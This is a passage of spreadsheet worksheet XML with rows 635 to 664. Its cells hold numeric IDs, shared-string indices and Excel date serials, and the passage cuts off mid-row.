    <row r="635" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A635" s="3">
        <v>329674</v>
      </c>
      <c r="B635" s="3" t="s">
        <v>248</v>
      </c>
      <c r="C635" s="9" t="s">
        <v>3623</v>
      </c>
      <c r="D635" s="9" t="s">
        <v>3624</v>
      </c>
      <c r="E635" s="9">
        <v>34218</v>
      </c>
      <c r="F635" s="9" t="s">
        <v>3386</v>
      </c>
      <c r="G635" s="10">
        <v>40519.248611111114</v>
      </c>
      <c r="H635" s="9">
        <v>120292</v>
      </c>
      <c r="I635" s="9" t="s">
        <v>3625</v>
      </c>
      <c r="J635" s="10">
        <v>40004.703472222223</v>
      </c>
      <c r="K635" s="3" t="s">
        <v>249</v>
      </c>
      <c r="L635" s="4">
        <v>3</v>
      </c>
      <c r="M635" s="4">
        <v>1</v>
      </c>
      <c r="N635" s="3" t="s">
        <v>705</v>
      </c>
      <c r="O635" s="3" t="s">
        <v>699</v>
      </c>
      <c r="P635" s="3"/>
      <c r="Q635" s="3"/>
    </row>
    <row r="636" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A636" s="9">
        <v>329837</v>
      </c>
      <c r="B636" s="9" t="s">
        <v>1460</v>
      </c>
      <c r="C636" s="9" t="s">
        <v>3626</v>
      </c>
      <c r="D636" s="9" t="s">
        <v>3627</v>
      </c>
      <c r="E636" s="9">
        <v>437</v>
      </c>
      <c r="F636" s="9" t="s">
        <v>3532</v>
      </c>
      <c r="G636" s="10">
        <v>39783.09375</v>
      </c>
      <c r="H636" s="9">
        <v>437</v>
      </c>
      <c r="I636" s="9" t="s">
        <v>3532</v>
      </c>
      <c r="J636" s="10">
        <v>39783.092361111114</v>
      </c>
      <c r="K636" s="9" t="s">
        <v>1461</v>
      </c>
      <c r="L636" s="7">
        <v>3</v>
      </c>
      <c r="M636" s="7">
        <v>1</v>
      </c>
      <c r="N636" s="9" t="s">
        <v>701</v>
      </c>
    </row>
    <row r="637" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A637" s="9">
        <v>330608</v>
      </c>
      <c r="B637" s="9" t="s">
        <v>1462</v>
      </c>
      <c r="C637" s="9" t="s">
        <v>3628</v>
      </c>
      <c r="D637" s="9" t="s">
        <v>3629</v>
      </c>
      <c r="E637" s="9">
        <v>830125</v>
      </c>
      <c r="F637" s="9" t="s">
        <v>3630</v>
      </c>
      <c r="G637" s="10">
        <v>42309.894444444442</v>
      </c>
      <c r="H637" s="9">
        <v>23393</v>
      </c>
      <c r="I637" s="9" t="s">
        <v>3631</v>
      </c>
      <c r="J637" s="10">
        <v>39783.564583333333</v>
      </c>
      <c r="K637" s="9" t="s">
        <v>1463</v>
      </c>
      <c r="L637" s="7">
        <v>5</v>
      </c>
      <c r="M637" s="7">
        <v>3</v>
      </c>
      <c r="N637" s="9" t="s">
        <v>696</v>
      </c>
      <c r="O637" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="638" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A638" s="3">
        <v>331567</v>
      </c>
      <c r="B638" s="3" t="s">
        <v>304</v>
      </c>
      <c r="C638" s="9" t="s">
        <v>3632</v>
      </c>
      <c r="D638" s="9" t="s">
        <v>3633</v>
      </c>
      <c r="E638" s="9">
        <v>241536</v>
      </c>
      <c r="F638" s="9" t="s">
        <v>3634</v>
      </c>
      <c r="G638" s="10">
        <v>40413.875694444447</v>
      </c>
      <c r="H638" s="9">
        <v>241536</v>
      </c>
      <c r="I638" s="9" t="s">
        <v>3634</v>
      </c>
      <c r="J638" s="10">
        <v>40413.874305555553</v>
      </c>
      <c r="K638" s="3" t="s">
        <v>305</v>
      </c>
      <c r="L638" s="4">
        <v>4</v>
      </c>
      <c r="M638" s="4">
        <v>2</v>
      </c>
      <c r="N638" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O638" s="3"/>
      <c r="P638" s="3"/>
      <c r="Q638" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="639" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A639" s="3">
        <v>331906</v>
      </c>
      <c r="B639" s="3" t="s">
        <v>306</v>
      </c>
      <c r="C639" s="9" t="s">
        <v>3635</v>
      </c>
      <c r="D639" s="9" t="s">
        <v>3636</v>
      </c>
      <c r="E639" s="9">
        <v>92</v>
      </c>
      <c r="F639" s="9" t="s">
        <v>1683</v>
      </c>
      <c r="G639" s="10">
        <v>39783.90347222222</v>
      </c>
      <c r="H639" s="9">
        <v>20654</v>
      </c>
      <c r="I639" s="9" t="s">
        <v>2617</v>
      </c>
      <c r="J639" s="10">
        <v>39783.817361111112</v>
      </c>
      <c r="K639" s="3" t="s">
        <v>307</v>
      </c>
      <c r="L639" s="4">
        <v>3</v>
      </c>
      <c r="M639" s="4">
        <v>1</v>
      </c>
      <c r="N639" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O639" s="3"/>
      <c r="P639" s="3"/>
      <c r="Q639" s="3"/>
    </row>
    <row r="640" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A640" s="3">
        <v>332311</v>
      </c>
      <c r="B640" s="3" t="s">
        <v>308</v>
      </c>
      <c r="C640" s="9" t="s">
        <v>3637</v>
      </c>
      <c r="D640" s="9" t="s">
        <v>3638</v>
      </c>
      <c r="E640" s="9">
        <v>576767</v>
      </c>
      <c r="F640" s="9" t="s">
        <v>3639</v>
      </c>
      <c r="G640" s="10">
        <v>42926.736111111109</v>
      </c>
      <c r="H640" s="9">
        <v>4124317</v>
      </c>
      <c r="I640" s="9" t="s">
        <v>3640</v>
      </c>
      <c r="J640" s="10">
        <v>42926.60833333333</v>
      </c>
      <c r="K640" s="3" t="s">
        <v>309</v>
      </c>
      <c r="L640" s="4">
        <v>6</v>
      </c>
      <c r="M640" s="4">
        <v>4</v>
      </c>
      <c r="N640" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O640" s="3" t="s">
        <v>703</v>
      </c>
      <c r="P640" s="3"/>
      <c r="Q640" s="3" t="s">
        <v>824</v>
      </c>
    </row>
    <row r="641" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A641" s="9">
        <v>332365</v>
      </c>
      <c r="B641" s="9" t="s">
        <v>1464</v>
      </c>
      <c r="C641" s="9" t="s">
        <v>3641</v>
      </c>
      <c r="D641" s="9" t="s">
        <v>3642</v>
      </c>
      <c r="E641" s="9">
        <v>559745</v>
      </c>
      <c r="F641" s="9" t="s">
        <v>3643</v>
      </c>
      <c r="G641" s="10">
        <v>42815.893055555556</v>
      </c>
      <c r="H641" s="9">
        <v>7275984</v>
      </c>
      <c r="I641" s="9" t="s">
        <v>2102</v>
      </c>
      <c r="J641" s="10">
        <v>42815.798611111109</v>
      </c>
      <c r="K641" s="9" t="s">
        <v>1465</v>
      </c>
      <c r="L641" s="7">
        <v>15</v>
      </c>
      <c r="M641" s="7">
        <v>13</v>
      </c>
      <c r="N641" s="9" t="s">
        <v>697</v>
      </c>
      <c r="O641" s="9" t="s">
        <v>698</v>
      </c>
    </row>
    <row r="642" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A642" s="3">
        <v>332367</v>
      </c>
      <c r="B642" s="3" t="s">
        <v>310</v>
      </c>
      <c r="C642" s="9" t="s">
        <v>3644</v>
      </c>
      <c r="D642" s="9" t="s">
        <v>3645</v>
      </c>
      <c r="E642" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F642" s="9" t="s">
        <v>2442</v>
      </c>
      <c r="G642" s="10">
        <v>41649.578472222223</v>
      </c>
      <c r="H642" s="9">
        <v>1133298</v>
      </c>
      <c r="I642" s="9" t="s">
        <v>3646</v>
      </c>
      <c r="J642" s="10">
        <v>41649.212500000001</v>
      </c>
      <c r="K642" s="3" t="s">
        <v>311</v>
      </c>
      <c r="L642" s="4">
        <v>15</v>
      </c>
      <c r="M642" s="4">
        <v>12</v>
      </c>
      <c r="N642" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O642" s="3" t="s">
        <v>699</v>
      </c>
      <c r="P642" s="3" t="s">
        <v>704</v>
      </c>
      <c r="Q642" s="3"/>
    </row>
    <row r="643" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A643" s="3">
        <v>332429</v>
      </c>
      <c r="B643" s="3" t="s">
        <v>324</v>
      </c>
      <c r="C643" s="9" t="s">
        <v>3647</v>
      </c>
      <c r="D643" s="9" t="s">
        <v>3648</v>
      </c>
      <c r="E643" s="9">
        <v>1790</v>
      </c>
      <c r="F643" s="9" t="s">
        <v>2945</v>
      </c>
      <c r="G643" s="10">
        <v>43138.007638888892</v>
      </c>
      <c r="H643" s="9">
        <v>111307</v>
      </c>
      <c r="I643" s="9" t="s">
        <v>3649</v>
      </c>
      <c r="J643" s="10">
        <v>43103.723611111112</v>
      </c>
      <c r="K643" s="3" t="s">
        <v>325</v>
      </c>
      <c r="L643" s="4">
        <v>24</v>
      </c>
      <c r="M643" s="4">
        <v>22</v>
      </c>
      <c r="N643" s="3" t="s">
        <v>700</v>
      </c>
      <c r="O643" s="3" t="s">
        <v>703</v>
      </c>
      <c r="P643" s="3"/>
      <c r="Q643" s="3"/>
    </row>
    <row r="644" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A644" s="3">
        <v>333143</v>
      </c>
      <c r="B644" s="3" t="s">
        <v>340</v>
      </c>
      <c r="C644" s="9" t="s">
        <v>3650</v>
      </c>
      <c r="D644" s="9" t="s">
        <v>3651</v>
      </c>
      <c r="E644" s="9">
        <v>4234</v>
      </c>
      <c r="F644" s="9" t="s">
        <v>3422</v>
      </c>
      <c r="G644" s="10">
        <v>39784.819444444445</v>
      </c>
      <c r="H644" s="9">
        <v>4234</v>
      </c>
      <c r="I644" s="9" t="s">
        <v>3422</v>
      </c>
      <c r="J644" s="10">
        <v>39784.818749999999</v>
      </c>
      <c r="K644" s="3" t="s">
        <v>341</v>
      </c>
      <c r="L644" s="4">
        <v>3</v>
      </c>
      <c r="M644" s="4">
        <v>1</v>
      </c>
      <c r="N644" s="3" t="s">
        <v>706</v>
      </c>
      <c r="O644" s="3" t="s">
        <v>703</v>
      </c>
      <c r="P644" s="3"/>
      <c r="Q644" s="3" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="645" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A645" s="3">
        <v>333174</v>
      </c>
      <c r="B645" s="3" t="s">
        <v>352</v>
      </c>
      <c r="C645" s="9" t="s">
        <v>3652</v>
      </c>
      <c r="D645" s="9" t="s">
        <v>3653</v>
      </c>
      <c r="E645" s="9">
        <v>17172</v>
      </c>
      <c r="F645" s="9" t="s">
        <v>3654</v>
      </c>
      <c r="G645" s="10">
        <v>39784.319444444445</v>
      </c>
      <c r="H645" s="9">
        <v>20654</v>
      </c>
      <c r="I645" s="9" t="s">
        <v>2617</v>
      </c>
      <c r="J645" s="10">
        <v>39784.300694444442</v>
      </c>
      <c r="K645" s="3" t="s">
        <v>353</v>
      </c>
      <c r="L645" s="4">
        <v>4</v>
      </c>
      <c r="M645" s="4">
        <v>2</v>
      </c>
      <c r="N645" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O645" s="3"/>
      <c r="P645" s="3"/>
      <c r="Q645" s="3"/>
    </row>
    <row r="646" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A646" s="3">
        <v>333217</v>
      </c>
      <c r="B646" s="3" t="s">
        <v>354</v>
      </c>
      <c r="C646" s="9" t="s">
        <v>3655</v>
      </c>
      <c r="D646" s="9" t="s">
        <v>3656</v>
      </c>
      <c r="E646" s="9">
        <v>22656</v>
      </c>
      <c r="F646" s="9" t="s">
        <v>2997</v>
      </c>
      <c r="G646" s="10">
        <v>39784.311111111114</v>
      </c>
      <c r="H646" s="9">
        <v>20654</v>
      </c>
      <c r="I646" s="9" t="s">
        <v>2617</v>
      </c>
      <c r="J646" s="10">
        <v>39784.301388888889</v>
      </c>
      <c r="K646" s="3" t="s">
        <v>355</v>
      </c>
      <c r="L646" s="4">
        <v>4</v>
      </c>
      <c r="M646" s="4">
        <v>2</v>
      </c>
      <c r="N646" s="3" t="s">
        <v>702</v>
      </c>
      <c r="O646" s="3"/>
      <c r="P646" s="3"/>
      <c r="Q646" s="3"/>
    </row>
    <row r="647" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A647" s="3">
        <v>333406</v>
      </c>
      <c r="B647" s="3" t="s">
        <v>372</v>
      </c>
      <c r="C647" s="9" t="s">
        <v>3657</v>
      </c>
      <c r="D647" s="9" t="s">
        <v>3658</v>
      </c>
      <c r="E647" s="9">
        <v>40342</v>
      </c>
      <c r="F647" s="9" t="s">
        <v>3659</v>
      </c>
      <c r="G647" s="10">
        <v>42122.621527777781</v>
      </c>
      <c r="H647" s="9">
        <v>611446</v>
      </c>
      <c r="I647" s="9" t="s">
        <v>3660</v>
      </c>
      <c r="J647" s="10">
        <v>42122.327777777777</v>
      </c>
      <c r="K647" s="3" t="s">
        <v>373</v>
      </c>
      <c r="L647" s="4">
        <v>3</v>
      </c>
      <c r="M647" s="4">
        <v>1</v>
      </c>
      <c r="N647" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O647" s="3"/>
      <c r="P647" s="3"/>
      <c r="Q647" s="3"/>
    </row>
    <row r="648" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A648" s="9">
        <v>333532</v>
      </c>
      <c r="B648" s="9" t="s">
        <v>1466</v>
      </c>
      <c r="C648" s="9" t="s">
        <v>3661</v>
      </c>
      <c r="D648" s="9" t="s">
        <v>3662</v>
      </c>
      <c r="E648" s="9">
        <v>26396</v>
      </c>
      <c r="F648" s="9" t="s">
        <v>3663</v>
      </c>
      <c r="G648" s="10">
        <v>39784.847916666666</v>
      </c>
      <c r="H648" s="9">
        <v>26396</v>
      </c>
      <c r="I648" s="9" t="s">
        <v>3663</v>
      </c>
      <c r="J648" s="10">
        <v>39784.831250000003</v>
      </c>
      <c r="K648" s="9" t="s">
        <v>1467</v>
      </c>
      <c r="L648" s="7">
        <v>5</v>
      </c>
      <c r="M648" s="7">
        <v>3</v>
      </c>
      <c r="N648" s="9" t="s">
        <v>705</v>
      </c>
      <c r="Q648" s="9" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="649" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A649" s="3">
        <v>333583</v>
      </c>
      <c r="B649" s="3" t="s">
        <v>374</v>
      </c>
      <c r="C649" s="9" t="s">
        <v>3664</v>
      </c>
      <c r="D649" s="9" t="s">
        <v>3665</v>
      </c>
      <c r="E649" s="9">
        <v>135769</v>
      </c>
      <c r="F649" s="9" t="s">
        <v>3666</v>
      </c>
      <c r="G649" s="10">
        <v>40280.792361111111</v>
      </c>
      <c r="H649" s="9">
        <v>29515</v>
      </c>
      <c r="I649" s="9" t="s">
        <v>3667</v>
      </c>
      <c r="J649" s="10">
        <v>40269.564583333333</v>
      </c>
      <c r="K649" s="3" t="s">
        <v>375</v>
      </c>
      <c r="L649" s="4">
        <v>3</v>
      </c>
      <c r="M649" s="4">
        <v>1</v>
      </c>
      <c r="N649" s="3" t="s">
        <v>703</v>
      </c>
      <c r="O649" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P649" s="3"/>
      <c r="Q649" s="3"/>
    </row>
    <row r="650" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A650" s="9">
        <v>333665</v>
      </c>
      <c r="B650" s="9" t="s">
        <v>1468</v>
      </c>
      <c r="C650" s="9" t="s">
        <v>3668</v>
      </c>
      <c r="D650" s="9" t="s">
        <v>3669</v>
      </c>
      <c r="E650" s="9">
        <v>15459</v>
      </c>
      <c r="F650" s="9" t="s">
        <v>3670</v>
      </c>
      <c r="G650" s="10">
        <v>39784.479166666664</v>
      </c>
      <c r="H650" s="9">
        <v>42348</v>
      </c>
      <c r="I650" s="9" t="s">
        <v>3671</v>
      </c>
      <c r="J650" s="10">
        <v>39784.468055555553</v>
      </c>
      <c r="K650" s="9" t="s">
        <v>1469</v>
      </c>
      <c r="L650" s="7">
        <v>2</v>
      </c>
      <c r="M650" s="7">
        <v>1</v>
      </c>
      <c r="N650" s="9" t="s">
        <v>703</v>
      </c>
      <c r="Q650" s="9" t="s">
        <v>1047</v>
      </c>
    </row>
    <row r="651" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A651" s="3">
        <v>333686</v>
      </c>
      <c r="B651" s="3" t="s">
        <v>376</v>
      </c>
      <c r="C651" s="9" t="s">
        <v>3672</v>
      </c>
      <c r="D651" s="9" t="s">
        <v>3673</v>
      </c>
      <c r="E651" s="9">
        <v>327563</v>
      </c>
      <c r="F651" s="9" t="s">
        <v>3674</v>
      </c>
      <c r="G651" s="10">
        <v>40968.361111111109</v>
      </c>
      <c r="H651" s="9">
        <v>34088</v>
      </c>
      <c r="I651" s="9" t="s">
        <v>3675</v>
      </c>
      <c r="J651" s="10">
        <v>39784.540277777778</v>
      </c>
      <c r="K651" s="3" t="s">
        <v>377</v>
      </c>
      <c r="L651" s="4">
        <v>3</v>
      </c>
      <c r="M651" s="4">
        <v>1</v>
      </c>
      <c r="N651" s="3" t="s">
        <v>699</v>
      </c>
      <c r="O651" s="3" t="s">
        <v>697</v>
      </c>
      <c r="P651" s="3" t="s">
        <v>698</v>
      </c>
      <c r="Q651" s="3"/>
    </row>
    <row r="652" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A652" s="3">
        <v>333704</v>
      </c>
      <c r="B652" s="3" t="s">
        <v>378</v>
      </c>
      <c r="C652" s="9" t="s">
        <v>3676</v>
      </c>
      <c r="D652" s="9" t="s">
        <v>3677</v>
      </c>
      <c r="E652" s="9">
        <v>327563</v>
      </c>
      <c r="F652" s="9" t="s">
        <v>3674</v>
      </c>
      <c r="G652" s="10">
        <v>40968.361111111109</v>
      </c>
      <c r="H652" s="9">
        <v>34088</v>
      </c>
      <c r="I652" s="9" t="s">
        <v>3675</v>
      </c>
      <c r="J652" s="10">
        <v>39784.538194444445</v>
      </c>
      <c r="K652" s="3" t="s">
        <v>379</v>
      </c>
      <c r="L652" s="4">
        <v>3</v>
      </c>
      <c r="M652" s="4">
        <v>1</v>
      </c>
      <c r="N652" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O652" s="3"/>
      <c r="P652" s="3" t="s">
        <v>716</v>
      </c>
      <c r="Q652" s="3"/>
    </row>
    <row r="653" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A653" s="3">
        <v>333897</v>
      </c>
      <c r="B653" s="3" t="s">
        <v>380</v>
      </c>
      <c r="C653" s="9" t="s">
        <v>3678</v>
      </c>
      <c r="D653" s="9" t="s">
        <v>3679</v>
      </c>
      <c r="E653" s="9">
        <v>327563</v>
      </c>
      <c r="F653" s="9" t="s">
        <v>3674</v>
      </c>
      <c r="G653" s="10">
        <v>40968.363194444442</v>
      </c>
      <c r="H653" s="9">
        <v>34088</v>
      </c>
      <c r="I653" s="9" t="s">
        <v>3675</v>
      </c>
      <c r="J653" s="10">
        <v>39857.625694444447</v>
      </c>
      <c r="K653" s="3" t="s">
        <v>381</v>
      </c>
      <c r="L653" s="4">
        <v>4</v>
      </c>
      <c r="M653" s="4">
        <v>2</v>
      </c>
      <c r="N653" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O653" s="3"/>
      <c r="P653" s="3"/>
      <c r="Q653" s="3"/>
    </row>
    <row r="654" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A654" s="3">
        <v>334051</v>
      </c>
      <c r="B654" s="3" t="s">
        <v>382</v>
      </c>
      <c r="C654" s="9" t="s">
        <v>3680</v>
      </c>
      <c r="D654" s="9" t="s">
        <v>3681</v>
      </c>
      <c r="E654" s="9">
        <v>327563</v>
      </c>
      <c r="F654" s="9" t="s">
        <v>3674</v>
      </c>
      <c r="G654" s="10">
        <v>40968.361805555556</v>
      </c>
      <c r="H654" s="9">
        <v>34088</v>
      </c>
      <c r="I654" s="9" t="s">
        <v>3675</v>
      </c>
      <c r="J654" s="10">
        <v>39786.347222222219</v>
      </c>
      <c r="K654" s="3" t="s">
        <v>383</v>
      </c>
      <c r="L654" s="4">
        <v>3</v>
      </c>
      <c r="M654" s="4">
        <v>1</v>
      </c>
      <c r="N654" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O654" s="3"/>
      <c r="P654" s="3"/>
      <c r="Q654" s="3"/>
    </row>
    <row r="655" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A655" s="9">
        <v>334485</v>
      </c>
      <c r="B655" s="9" t="s">
        <v>1470</v>
      </c>
      <c r="C655" s="9" t="s">
        <v>3682</v>
      </c>
      <c r="D655" s="9" t="s">
        <v>3683</v>
      </c>
      <c r="E655" s="9">
        <v>419</v>
      </c>
      <c r="F655" s="9" t="s">
        <v>812</v>
      </c>
      <c r="G655" s="10">
        <v>39881.876388888886</v>
      </c>
      <c r="H655" s="9">
        <v>16587</v>
      </c>
      <c r="I655" s="9" t="s">
        <v>1733</v>
      </c>
      <c r="J655" s="10">
        <v>39881.875694444447</v>
      </c>
      <c r="K655" s="9" t="s">
        <v>1471</v>
      </c>
      <c r="L655" s="7">
        <v>7</v>
      </c>
      <c r="M655" s="7">
        <v>5</v>
      </c>
      <c r="Q655" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="656" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A656" s="9">
        <v>334729</v>
      </c>
      <c r="B656" s="9" t="s">
        <v>1472</v>
      </c>
      <c r="C656" s="9" t="s">
        <v>3684</v>
      </c>
      <c r="D656" s="9" t="s">
        <v>3685</v>
      </c>
      <c r="E656" s="9">
        <v>17235</v>
      </c>
      <c r="F656" s="9" t="s">
        <v>3686</v>
      </c>
      <c r="G656" s="10">
        <v>39784.736805555556</v>
      </c>
      <c r="H656" s="9">
        <v>17235</v>
      </c>
      <c r="I656" s="9" t="s">
        <v>3686</v>
      </c>
      <c r="J656" s="10">
        <v>39784.71875</v>
      </c>
      <c r="K656" s="9" t="s">
        <v>1473</v>
      </c>
      <c r="L656" s="7">
        <v>2</v>
      </c>
      <c r="M656" s="7">
        <v>1</v>
      </c>
      <c r="N656" s="9" t="s">
        <v>703</v>
      </c>
      <c r="P656" s="9" t="s">
        <v>955</v>
      </c>
      <c r="Q656" s="9" t="s">
        <v>709</v>
      </c>
    </row>
    <row r="657" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A657" s="9">
        <v>334748</v>
      </c>
      <c r="B657" s="9" t="s">
        <v>1474</v>
      </c>
      <c r="C657" s="9" t="s">
        <v>3687</v>
      </c>
      <c r="D657" s="9" t="s">
        <v>3688</v>
      </c>
      <c r="E657" s="9">
        <v>1</v>
      </c>
      <c r="F657" s="9" t="s">
        <v>1865</v>
      </c>
      <c r="G657" s="10">
        <v>39784.742361111108</v>
      </c>
      <c r="H657" s="9">
        <v>18770</v>
      </c>
      <c r="I657" s="9" t="s">
        <v>3689</v>
      </c>
      <c r="J657" s="10">
        <v>39784.741666666669</v>
      </c>
      <c r="K657" s="9" t="s">
        <v>1475</v>
      </c>
      <c r="L657" s="7">
        <v>5</v>
      </c>
      <c r="M657" s="7">
        <v>3</v>
      </c>
      <c r="N657" s="9" t="s">
        <v>703</v>
      </c>
      <c r="O657" s="9" t="s">
        <v>699</v>
      </c>
      <c r="P657" s="9" t="s">
        <v>708</v>
      </c>
    </row>
    <row r="658" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A658" s="9">
        <v>335525</v>
      </c>
      <c r="B658" s="9" t="s">
        <v>1476</v>
      </c>
      <c r="C658" s="9" t="s">
        <v>3690</v>
      </c>
      <c r="D658" s="9" t="s">
        <v>3691</v>
      </c>
      <c r="E658" s="9">
        <v>42628</v>
      </c>
      <c r="F658" s="9" t="s">
        <v>3692</v>
      </c>
      <c r="G658" s="10">
        <v>39784.910416666666</v>
      </c>
      <c r="H658" s="9">
        <v>42628</v>
      </c>
      <c r="I658" s="9" t="s">
        <v>3692</v>
      </c>
      <c r="J658" s="10">
        <v>39784.902083333334</v>
      </c>
      <c r="K658" s="9" t="s">
        <v>1477</v>
      </c>
      <c r="L658" s="7">
        <v>3</v>
      </c>
      <c r="M658" s="7">
        <v>2</v>
      </c>
      <c r="N658" s="9" t="s">
        <v>703</v>
      </c>
    </row>
    <row r="659" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A659" s="3">
        <v>335596</v>
      </c>
      <c r="B659" s="5" t="s">
        <v>480</v>
      </c>
      <c r="C659" s="9" t="s">
        <v>3693</v>
      </c>
      <c r="D659" s="9" t="s">
        <v>3694</v>
      </c>
      <c r="E659" s="9" t="s">
        <v>1602</v>
      </c>
      <c r="F659" s="9" t="s">
        <v>3695</v>
      </c>
      <c r="G659" s="10">
        <v>39875.939583333333</v>
      </c>
      <c r="H659" s="9">
        <v>5640</v>
      </c>
      <c r="I659" s="9" t="s">
        <v>1706</v>
      </c>
      <c r="J659" s="10">
        <v>39875.936111111114</v>
      </c>
      <c r="K659" s="3" t="s">
        <v>481</v>
      </c>
      <c r="L659" s="4">
        <v>3</v>
      </c>
      <c r="M659" s="4">
        <v>1</v>
      </c>
      <c r="N659" s="3" t="s">
        <v>704</v>
      </c>
      <c r="O659" s="3"/>
      <c r="P659" s="3"/>
      <c r="Q659" s="3"/>
    </row>
    <row r="660" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A660" s="9">
        <v>336859</v>
      </c>
      <c r="B660" s="9" t="s">
        <v>1478</v>
      </c>
      <c r="C660" s="9" t="s">
        <v>3696</v>
      </c>
      <c r="D660" s="9" t="s">
        <v>3697</v>
      </c>
      <c r="E660" s="9">
        <v>31569</v>
      </c>
      <c r="F660" s="9" t="s">
        <v>3698</v>
      </c>
      <c r="G660" s="10">
        <v>40463.657638888886</v>
      </c>
      <c r="H660" s="9">
        <v>56338</v>
      </c>
      <c r="I660" s="9" t="s">
        <v>2772</v>
      </c>
      <c r="J660" s="10">
        <v>40461.717361111114</v>
      </c>
      <c r="K660" s="9" t="s">
        <v>1479</v>
      </c>
      <c r="L660" s="7">
        <v>5</v>
      </c>
      <c r="M660" s="7">
        <v>3</v>
      </c>
      <c r="N660" s="9" t="s">
        <v>702</v>
      </c>
      <c r="Q660" s="9" t="s">
        <v>715</v>
      </c>
    </row>
    <row r="661" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A661" s="3">
        <v>336939</v>
      </c>
      <c r="B661" s="3" t="s">
        <v>482</v>
      </c>
      <c r="C661" s="9" t="s">
        <v>3699</v>
      </c>
      <c r="D661" s="9" t="s">
        <v>3700</v>
      </c>
      <c r="E661" s="9">
        <v>12950</v>
      </c>
      <c r="F661" s="9" t="s">
        <v>3701</v>
      </c>
      <c r="G661" s="10">
        <v>39786.555555555555</v>
      </c>
      <c r="H661" s="9">
        <v>12950</v>
      </c>
      <c r="I661" s="9" t="s">
        <v>3701</v>
      </c>
      <c r="J661" s="10">
        <v>39786.555555555555</v>
      </c>
      <c r="K661" s="3" t="s">
        <v>483</v>
      </c>
      <c r="L661" s="4">
        <v>3</v>
      </c>
      <c r="M661" s="4">
        <v>1</v>
      </c>
      <c r="N661" s="3" t="s">
        <v>698</v>
      </c>
      <c r="O661" s="3" t="s">
        <v>700</v>
      </c>
      <c r="P661" s="3" t="s">
        <v>703</v>
      </c>
      <c r="Q661" s="3"/>
    </row>
    <row r="662" spans="1:17" x14ac:dyDescent="0.3">
      <c r="A662" s="3">
        <v>337006</v>
      </c>
      <c r="B662" s="3" t="s">
        <v>484</v>
      </c>
      <c r="C662" s="9" t="s">
        <v>3702</v>
      </c>
      <c r="D662" s="9" t="s">
        <v>3703</v>
      </c>
      <c r="E662" s="9">
        <v>21132</v>
      </c>
      <c r="F662" s="9" t="s">
        <v>3704</v>
      </c>
      <c r="G662" s="10">
        <v>42606.409722222219</v>
      </c>
      <c r="H662" s="9">
        <v>3191896</v>
      </c>
      <c r="I662" s="9" t="s">
        <v>3705</v>
      </c>
      <c r="J662" s="10">
        <v>42556.543749999997</v>
      </c>
      <c r="K662" s="3" t="s">
        <v>485</v>
      </c>
      <c r="L662" s="4">
        <v>4</v>
      </c>
      <c r="M662" s="4">
        <v>2</v>
      </c>
      <c r="N662" s="3" t="s">
        <v>701</v>
      </c>
      <c r="O662" s="3"/>
      <c r="P662" s="3"/>
      <c r="Q662" s="3"/>
    </row>
    <row r="663" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A663" s="9">
        <v>337181</v>
      </c>
      <c r="B663" s="9" t="s">
        <v>1480</v>
      </c>
      <c r="C663" s="9" t="s">
        <v>3706</v>
      </c>
      <c r="D663" s="9" t="s">
        <v>3707</v>
      </c>
      <c r="E663" s="9">
        <v>42826</v>
      </c>
      <c r="F663" s="9" t="s">
        <v>3708</v>
      </c>
      <c r="G663" s="10">
        <v>39785.615972222222</v>
      </c>
      <c r="H663" s="9">
        <v>42826</v>
      </c>
      <c r="I663" s="9" t="s">
        <v>3708</v>
      </c>
      <c r="J663" s="10">
        <v>39785.611111111109</v>
      </c>
      <c r="K663" s="9" t="s">
        <v>1481</v>
      </c>
      <c r="L663" s="7">
        <v>4</v>
      </c>
      <c r="M663" s="7">
        <v>2</v>
      </c>
      <c r="N663" s="9" t="s">
        <v>705</v>
      </c>
      <c r="P663" s="9" t="s">
        <v>715</v>
      </c>
      <c r="Q663" s="9" t="s">
        <v>712</v>
      </c>
    </row>
    <row r="664" spans="1:17" ht="14.4" x14ac:dyDescent="0.3">
      <c r="A664" s="9">
        <v>337704</v>
      </c>
      <c r="B664" s="9" t="s">
        <v>1482</v>
      </c>
      <c r="C664" s="9" t="s">
        <v>3709</v>
      </c>
